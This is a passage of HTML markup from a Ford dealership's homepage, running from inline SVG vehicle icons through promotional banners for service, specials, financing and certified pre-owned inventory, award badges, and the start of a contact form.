61,0,0,1,3.93,6.46h0a1.6,1.6,0,0,1,1.14.47h0a1.6,1.6,0,0,1,.47,1.14v.32h5.35V8.07A1.61,1.61,0,0,1,12.5,6.46h0a1.6,1.6,0,0,1,1.14.47h0a1.6,1.6,0,0,1,.47,1.14v.32a1.51,1.51,0,0,0,.76-.14.57.57,0,0,1,0-.1ZM9.71,4.91h0a1.15,1.15,0,0,0-.15.55.16.16,0,0,0,.16.17h.37c.39,0-.07-.71-.21-.76A.16.16,0,0,0,9.71,4.91ZM6.47,7.65v.28h4Z"></path></symbol><symbol id="truck" viewBox="0 0 15.5 5"><path d="M6.09,4.72H9.24a2.7,2.7,0,0,1,1.39.65.29.29,0,0,0-.12.07h0a1,1,0,0,0-.17.56H5.91ZM9.16,6.25H8.51v.19h.65Zm1.45-.71h0a1,1,0,0,0-.12.47.14.14,0,0,0,.14.14h.31c.33,0-.06-.6-.18-.64A.14.14,0,0,0,10.61,5.54ZM5.22,7.86V8.1H11Zm7.76.3a.31.31,0,1,0,.31.31A.31.31,0,0,0,13,8.15Zm2.29-.31v.44a.34.34,0,0,1-.12.32,1.49,1.49,0,0,1-.81.17h-.21a1.19,1.19,0,0,1-1.92.6h0a1.2,1.2,0,0,1-.38-.6H4.23a1.19,1.19,0,0,1-2.3,0H1.67a4.54,4.54,0,0,1-1.39-.3l-.09,0V7.26l0,0a.63.63,0,0,0,.19-.33V6.65c0-.16,0-.35,0-.51a.59.59,0,0,1,.36-.39H5.13l.22-1.1a.42.42,0,0,1,.42-.34H9.25a3.15,3.15,0,0,1,1.81.88,7.52,7.52,0,0,0,.77.57l.53,0c1.29,0,2.46.14,2.59.71l.13,1A.39.39,0,0,1,15.27,7.84Zm-11.4.62a.8.8,0,1,0-.8.8A.8.8,0,0,0,3.87,8.46Zm.8-.25a1.6,1.6,0,1,0-3.2,0v.26l.24,0V8.22A1.37,1.37,0,0,1,3.07,6.85h0a1.36,1.36,0,0,1,1,.4H4a1.36,1.36,0,0,1,.4,1v.27h.24Zm6.52,0a1.78,1.78,0,0,1,3.34-.87V6.64h.16v-.1c-.09-.4-1.6-.45-2.33-.48l-.58,0-.06,0a7.52,7.52,0,0,1-.83-.61,2.89,2.89,0,0,0-1.65-.82H5.76a.14.14,0,0,0-.14.11L5.36,6H.89a.42.42,0,0,0-.16.15h.63v.23c0,.24-.38.46-.66.46v0a.81.81,0,0,1-.23.48v.87a5.12,5.12,0,0,0,.81.21V8.22a1.79,1.79,0,1,1,3.58,0v.27h6.33Zm2.58.25a.8.8,0,1,0-.8.8A.8.8,0,0,0,13.78,8.46Zm.8-.25a1.6,1.6,0,1,0-3.2,0v.27h.24V8.22a1.36,1.36,0,0,1,.4-1h0a1.36,1.36,0,0,1,1-.4h0a1.36,1.36,0,0,1,1,.4h0a1.36,1.36,0,0,1,.4,1v.27l.24,0ZM15,7.84s-.07-.09-.09-.1l0,0h-.16a1.76,1.76,0,0,1,.08.5v.23A.73.73,0,0,0,15,8.37a.48.48,0,0,1,0-.08ZM3.07,8.15a.31.31,0,1,0,.31.31A.31.31,0,0,0,3.07,8.15Zm3.54-1.9H6v.19h.65Z"></path></symbol><symbol id="wagon" viewBox="0 0 15.5 5"><path d="M3.38,6.59a3.28,3.28,0,0,1-1.22-.14c1.5-1.1,1.32-1.06,3.36-1.06H7.58a4.09,4.09,0,0,1,1.2.18,6.63,6.63,0,0,1,1.09.51l0,0h0a.63.63,0,0,0-.2.44.33.33,0,0,0,0,.06ZM8.3,7H7.53v.22H8.3ZM5.11,7H4.34v.22h.77Zm.44,1.38v.28h5.22Zm4.94-1.79a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10.48,6.63Zm-6.73,2a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.75,8.6Zm11.5.68-.14,0a4.06,4.06,0,0,1-1.08.1h-.42a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.82a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H1.79a2.35,2.35,0,0,1-.74-.14H.42V9L.23,8.9l-.08,0V7.73l0,0a1,1,0,0,0,.14-.42l0-.78,1.47-1,0-.33.15,0a14.66,14.66,0,0,1,2.63-.22H7.81a5.41,5.41,0,0,1,1.11.2A16,16,0,0,1,11.2,6.28a20.48,20.48,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.59,8.91a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.59,8.91Zm8.79,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.38,8.91ZM14.9,9V8.76h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.59a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.13l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74A3.26,3.26,0,0,0,13.49,7a20.37,20.37,0,0,0-2.36-.41l-.07,0A16.81,16.81,0,0,0,8.83,5.41a5.08,5.08,0,0,0-1-.19H4.57a15.18,15.18,0,0,0-2.4.18l0,.22-1.51,1v.22h.55v.22c0,.23-.36.43-.63.44a1.67,1.67,0,0,1-.11.27v.85a2.92,2.92,0,0,0,1.34.42h.51V8.84a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26h6V8.84a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1v.26H14A4.07,4.07,0,0,0,14.9,9ZM12.54,8.6a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.54,8.6Z"></path></symbol><symbol id="cargo" viewBox="50 65 400 100"><path d="M343.7,216.3c-0.1,1.6,0.3,3.1,1.1,4.4h-7.6c-17.8,0-51.6-13.8-51.6-13.8v-46.6h25.2c2.1,0,3.9,0.7,5.6,2.1c6.6,5.7,13.2,12.1,18.8,17.2c5.7,5.2,12.3,11.5,19.1,17.2c-2,0.1-3.9,0.9-5.5,2.4l0,0C345.4,202.6,343.9,211.6,343.7,216.3zM356.1,201.4c-1.5-0.5-3.1-0.2-4.3,0.9l-0.1,0.1c-2.4,2.3-3.6,10.8-3.7,14.1c0,1.2,0.3,2.2,1.2,3c0.8,0.8,1.8,1.3,3,1.3h9.4C371.6,220.8,359.8,202.7,356.1,201.4z M280.7,226.3h19.6v-5.7h-19.6V226.3z M249.4,221.2H269v-5.7h-19.6V221.2z M90.4,225.1h66.3v-5.7H90.4V225.1zM446.9,263.8l-0.2,14.6c-0.1,6.1-4.5,11.3-10.6,12.4l-2,0.3c-3.5,0.5-13.6,0.7-21.3,0.7h-2.3v0h-4.3h-2.4c-1.4,5.1-4.2,9.7-7.8,13.4h0c-5.5,5.5-13.2,9-21.7,9c-8.5,0-16.1-3.4-21.7-9c-3.7-3.7-6.4-8.3-7.8-13.4h-2.4h-4.3v0H165.4v0h-4.3h-2.4c-1.4,5.1-4.2,9.7-7.8,13.4h0c-5.5,5.5-13.2,9-21.7,9c-8.5,0-16.1-3.4-21.7-9c-3.7-3.7-6.4-8.3-7.8-13.4h-2.4H93v0H81.3c-0.4,0-0.7,0-1.1,0c-10.1,0-16.7-3.9-20.5-7.2c-4.3-3.8-6.1-7.6-6.2-8l-0.4-1.7v-26.5l0.6-1c0.1-0.1,0.9-1.5,1.8-3.6c1.1-2.7,1.7-5.2,1.7-7.2c0.1-2,0.2-7.1,0.4-14.1c0.5-21.3,1.3-57,2.9-68.5l1.2-7.5h257.4l1.2,1c6.4,5.3,14,12.2,21.9,19.5c12.6,11.5,25.6,23.3,33.7,28.4c6.5,2.1,59.6,19.6,62.2,31.3c3.4,12.3,3.6,14.4,3.3,26.5C444.9,255.6,446.9,259.5,446.9,263.8zM147.9,283.6c0-10.3-8.4-18.7-18.7-18.7c-10.3,0-18.7,8.4-18.7,18.7c0,10.3,8.4,18.7,18.7,18.7C139.5,302.3,147.9,293.9,147.9,283.6z M393,283.6c0-10.3-8.4-18.7-18.7-18.7c-10.3,0-18.7,8.4-18.7,18.7c0,10.3,8.4,18.7,18.7,18.7C384.6,302.3,393,293.9,393,283.6z M438.4,263.7c0-1.8-1-3.3-2.6-4l-2.7-1.1l-0.2-3.1c0.2-6.2,0.3-9.8,0-13c-10-5.4-23.7-13.1-26-15.4c-0.8-0.8-1.2-6-1.2-11.6c-12.2-5.2-25.9-10.2-32.7-12.1l-1.1-0.5c-8.8-5.3-22.3-17.7-35.4-29.6c-7.4-6.8-14.4-13.2-20.4-18.2l-247.1,0.2c-0.5,3.5-0.9,9.6-1.3,16.9h9.9v50.9c-0.2,5.1-5.6,9.7-11.7,12.2c0,0.6,0,1.2-0.1,1.5c0,2.9-0.8,6.4-2.4,10.2c-0.6,1.5-1.3,2.8-1.7,3.6v23.2c0.5,0.9,1.7,2.6,3.7,4.4c4.1,3.6,9.5,5.3,15.9,5.1H93v-0.9c0-10,4.1-19,10.6-25.6c6.6-6.6,15.6-10.6,25.6-10.6h0c9.9,0,19,4.1,25.5,10.6l0,0l0,0c6.6,6.6,10.6,15.6,10.6,25.5v0.9h172.7v-0.9c0-10,4.1-19,10.6-25.6c6.6-6.6,15.6-10.6,25.6-10.6h0c9.9,0,19,4.1,25.5,10.6l0,0l0,0c6.6,6.6,10.6,15.6,10.6,25.5v0.9h2.3c7.4,0,17.3-0.3,20.2-0.7l1.6-0.3c2-0.4,3.5-2.1,3.5-4.1L438.4,263.7z M374.3,275.8c-4.3,0-7.8,3.5-7.8,7.8c0,4.3,3.5,7.8,7.8,7.8c4.3,0,7.8-3.5,7.8-7.8C382.1,279.3,378.6,275.8,374.3,275.8z M129.2,275.8c-4.3,0-7.8,3.5-7.8,7.8c0,4.3,3.5,7.8,7.8,7.8c4.3,0,7.8-3.5,7.8-7.8C137,279.3,133.5,275.8,129.2,275.8z"></path></symbol></svg><div class="sc-fjhmcy gsMIaE" data-jzlbind-list="h('hpsmFiltersState.availableFilters.bodyTypes.items')"><script type="x-tmpl-mustache"><div class="sc-yZwTr fUlKob"><a class="sc-iuDHTM kPeqfK" href="https://www.5starford.com/inventory/all-vehicles/vehicle-type={{value}}"><div class="sc-lnmtFM jTvCyr"><div class="sc-erNlkL czhwq"><svg width="80" height="80"><use xlink:href="#{{icon}}" class="sc-kEmuub dtcLbA"></use></svg></div></div><div class="sc-FQuPU bhpcOA">{{label}}</div></a></div></script></div></div></div></div></div></div></div></div></div></div><div id="TradePending-Retain-Extra-Column" class="vc_row wpb_row vc_row-fluid full-width no-padding bgpos-top_center priority-grid-a"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1538627169265"><div class="wpb_wrapper"></div></div></div><div class="vc_custom_1467797293125 wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1538631508688"><div class="wpb_wrapper"></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1538632882320 vc_row-has-fill priority-grid-z hide-atf"><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763111370"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask half left-side vc_custom_1538635335447 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-xs-6"><div class="vc_column-inner vc_custom_1538635613307"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_right vc_custom_1538635449229"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="44" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-medium" alt="" sizes="(max-width: 300px) 100vw, 300px" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_fordservice-300x44.png" data-jzlbind-image-srcset="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_fordservice-300x44.png 300w, https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_fordservice.png 325w" /></div></figure></div><h2 style="font-size: 1.6125em;color: #ffffff;line-height: normal;text-align: right" class="vc_custom_heading cta_banner_header vc_custom_1538657100946" ><a href="/schedule-service/">Trusted Service</a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-right vc_custom_1538657091821" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/schedule-service/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> Schedule Service</a></div></div></div></div></div></div></div></div><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1538646833204"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask vc_custom_1464726369532 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-lg-7 vc_col-xs-6"><div class="vc_column-inner vc_custom_1467810739319"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #000000;line-height: normal;text-align: left" class="vc_custom_heading cta_banner_header vc_custom_1538656191374" ><a href="/new-specials/">New Car Specials</a></h2><div class="vc_btn3-container cta_banner_submit filled vc_btn3-left vc_custom_1538657124395" ><a style="background-color:#d71820; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom" href="/new-specials/" title="">View Inventory</a></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1538632933246 vc_row-has-fill priority-grid-z hide-atf"><div class="cta_banner appraise-trade wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763233702"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask vc_custom_1538636504608 vc_row-has-fill vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-8 vc_col-sm-offset-4 vc_col-xs-offset-6 vc_col-xs-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1531938067959"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #000000;line-height: normal;text-align: right" class="vc_custom_heading cta_banner_header vc_custom_1538636258833" ><a href="/value-your-trade/">Appraise Your Trade</a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-right vc_custom_1538657134595" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/value-your-trade/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> Start Now</a></div></div></div></div></div></div></div></div><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763209903"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask half vc_custom_1464805354278 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-sm-offset-6 vc_col-xs-offset-6 vc_col-xs-6"><div class="vc_column-inner vc_custom_1468011579430"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #ffffff;line-height: normal;text-align: left" class="vc_custom_heading cta_banner_header vc_custom_1538636273217" ><a href="/inventory/used-specials/">Used Car Specials</a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-left vc_custom_1538657143475" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/inventory/used-specials/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> View Inventory</a></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1538632888986 vc_row-has-fill priority-grid-z hide-atf"><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763253914"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask half left-side vc_custom_1466681649660 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-xs-6"><div class="vc_column-inner vc_custom_1468011589072"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #ffffff;line-height: normal;text-align: right" class="vc_custom_heading cta_banner_header vc_custom_1538636281819" ><a href="/finance-solutions/">Finance Solutions</a></h2><div class="vc_btn3-container cta_banner_submit vc_btn3-right vc_custom_1538657183402" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/apply-for-financing/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> Get Pre‑approved</a></div></div></div></div></div></div></div></div><div class="cta_banner cpo wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763275253"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask vc_custom_1464726369532 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-7 vc_col-md-6 vc_col-xs-6"><div class="vc_column-inner vc_custom_1468011599067"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_left vc_custom_1538647271372"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="42" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-medium" alt="" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_fordcertified-300x42-300x42.png" /></div></figure></div><h2 style="font-size: 1.6125em;color: #ffffff;line-height: normal;text-align: left" class="vc_custom_heading cta_banner_header vc_custom_1538636289323" ><a href="/inventory/certified-pre-owned/">Certified Pre‑Owned</a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-left vc_custom_1538657168849" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/inventory/certified-pre-owned/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> View Inventory</a></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1538632510694 vc_row-has-fill priority-grid-z hide-atf"><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763299546"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask vc_custom_1464726369532 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-8 vc_col-sm-offset-4 vc_col-xs-offset-7 vc_col-xs-5"><div class="vc_column-inner vc_custom_1538642782386"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #000000;line-height: normal;text-align: right" class="vc_custom_heading cta_banner_header vc_custom_1541121348186" ><a href="https://5starford.worktrucksolutions.com/" target=" _blank">New Work Trucks </a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-right vc_custom_1541121399503" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="https://5starford.worktrucksolutions.com/" title="" target="_blank"><i class="vc_btn3-icon fa fa-arrow-right"></i> Search Now</a></div></div></div></div></div></div></div></div><div class="cta_banner wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1547763325346"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid cta_banner_mask half vc_custom_1464805354278 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-sm-offset-6 vc_col-xs-offset-6 vc_col-xs-6"><div class="vc_column-inner vc_custom_1468011579430"><div class="wpb_wrapper"><h2 style="font-size: 1.6125em;color: #ffffff;line-height: normal;text-align: left" class="vc_custom_heading cta_banner_header vc_custom_1538656163978" ><a href="/inventory/used-cars-under-10k/">Vehicles Under<br />$10,000</a></h2><div class="vc_btn3-container cta_banner_submit text vc_btn3-left vc_custom_1538657205873" ><a style="color:#00a7ee;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom vc_btn3-icon-left" href="/inventory/used-cars-under-10k/" title=""><i class="vc_btn3-icon fa fa-arrow-right"></i> View Inventory</a></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1538645507136 vc_row-has-fill vc_row-o-equal-height vc_row-o-content-middle vc_row-flex priority-grid-z hide-atf"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-3 vc_col-xs-12"><div class="vc_column-inner vc_custom_1538646176009"><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element vc_custom_1538656478514 col-reviews" ><div class="wpb_wrapper"><p><img class="size-full wp-image-2349 aligncenter" src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/2018-UNITED-STATES-SHIELD_gopt.png" alt="" width="134" /></p><h2>2018 United States<br />Dealer of the Year</h2><p><a href="/reviews">Read Our Reviews</a></p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-5 vc_col-xs-12 vc_col-has-fill"><div class="vc_column-inner vc_custom_1538646166273"><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element col-testimonials" ><div class="wpb_wrapper"><p><img class="alignnone size-full wp-image-2352" src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/AwardLineup_gopt.png" alt="" width="834" height="246" /></p><h2>&#8220;The people at Five Star Ford made our car buying experience a great one!&#8221;</h2><div class="source">Badgrizzly Dealer Rater</div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_hidden-md vc_hidden-sm vc_hidden-xs"><div class="vc_column-inner vc_custom_1538646119475"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_right vc_custom_1547763345363"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="612" height="486" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" sizes="(max-width: 612px) 100vw, 612px" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/couple-11.jpg" data-jzlbind-image-srcset="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/couple-11.jpg 612w, https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/couple-11-300x238.jpg 300w" /></div></figure></div></div></div></div></div><div id="row_location" class="vc_row wpb_row vc_row-fluid full-width no-padding vc_custom_1548957526521 vc_row-has-fill priority-grid-z hide-atf"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h1 class="vc_custom_heading" style="font-size: 3.2vw; color: #ffffff; line-height: normal; text-align: center;">Serving the Greater Dallas-Fort Worth Area</h1></div></div><div class="vc_btn3-container vc_btn3-center" ><a style="background-color:#bc0000; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-custom" href="/hours-directions/" title="">Hours &amp; Directions</a></div></div></div></div></div><div id="row_honors" class="vc_row wpb_row vc_row-fluid cta_banner full-width no-padding vc_custom_1538656557180 vc_row-has-fill priority-grid-z hide-atf"><div class="wpb_column vc_column_container vc_col-sm-10 vc_col-sm-offset-1 vc_col-xs-offset-1 vc_col-xs-10 vc_hidden-xs"><div class="vc_column-inner vc_custom_1538652325780"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center vc_custom_1538644297025"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="423" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" sizes="(max-width: 423px) 100vw, 423px" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/stars.png" data-jzlbind-image-srcset="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/stars.png 423w, https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/stars-300x48.png 300w" /></div></figure></div><h1 style="font-size: 2.25vw;color: #000000;line-height: normal;text-align: center" class="vc_custom_heading vc_custom_1468452293872" >Five Star Ford Consistently Receives Top Honors</h1><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1460616516386"><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="226" height="104" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_presidents.png" /></a></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="339" height="128" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" sizes="(max-width: 339px) 100vw, 339px" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_edmunds.png" data-jzlbind-image-srcset="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_edmunds.png 339w, https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_edmunds-300x113.png 300w" /></a></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="148" height="153" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_ford100.png" /></a></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="186" height="88" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_premierclub.png" /></a></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="317" height="101" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" sizes="(max-width: 317px) 100vw, 317px" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_bbb.png" data-jzlbind-image-srcset="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_bbb.png 317w, https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_bbb-300x96.png 300w" /></a></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><a href="/awards/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="255" height="120" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="vc_single_image-img attachment-full" alt="" data-jzlbind-image-src="https://images.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/award_triplecrown.png" /></a></figure></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid vc_custom_1534220277182 vc_row-has-fill priority-grid-b"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-has-fill"><div class="vc_column-inner vc_custom_1465268992639"><div class="wpb_wrapper"><div class="c-df9f860f-c8d9-4d76-a87a-5af65b75c03b sc-fnwBNb hiSVkK"><div id="form_110" class="sc-cmjSyW klLzjI"><div class="sc-sdtwF dTaPzh"><div class="sc-cTjmhe cqzkie">Quick Question?</div><p 